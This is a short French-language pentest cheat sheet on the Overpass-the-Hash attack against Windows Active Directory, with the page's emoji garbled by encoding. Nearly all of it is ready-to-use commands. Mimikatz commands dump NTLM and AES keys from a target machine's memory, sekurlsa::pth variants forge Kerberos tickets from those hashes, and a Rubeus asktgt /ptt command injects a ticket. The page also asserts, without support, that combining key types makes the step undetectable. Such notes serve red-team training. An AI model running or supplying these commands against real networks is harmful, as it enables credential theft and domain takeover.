๐Ÿ—ก๏ธOver Pass The Hash

Over Pass the hash est une combinaison de passage du hash et de passage du ticket. Permet la crรฉation de tickets Kerberos ร  partir de clรฉs de hachage NTLM ou AES qui autorisent l'accรจs au service de ressources nรฉcessitant une authentification Kerberos.

Avec Mimikatz

privilege::debug
sekurlsa::ekeys

ekeys va permettre d'afficher toutes les clรฉs NTLM (RC4), AES128 et AES256 de la machine cible.

Ainsi, avec l'aide de la commande sekurlsa :: pth, nous pouvons essayer d'utiliser la clรฉ ase256 ou aes128 pour le ticket Kerberos.

sekurlsa::pth /user:<username> /domain:<domain> /aes256:<hash> 
sekurlsa::pth /user:<username> /domain:<domain> /aes128:<hash>

Si vous utilisez simultanรฉment NTLM (RC4), ASE128, ASE256 pour l'injection dans le ticket Kerberos, cette รฉtape est plus sรฉcurisรฉe et indรฉtectable dans le rรฉseau.

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /aes128:<hash> /aes256:<hash>
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>

Avec Rubeus

Rubeus.exe asktgt /domain:<domain> /user:<username> /rc4:<hash> /ptt

Derniรจre mise ร  jour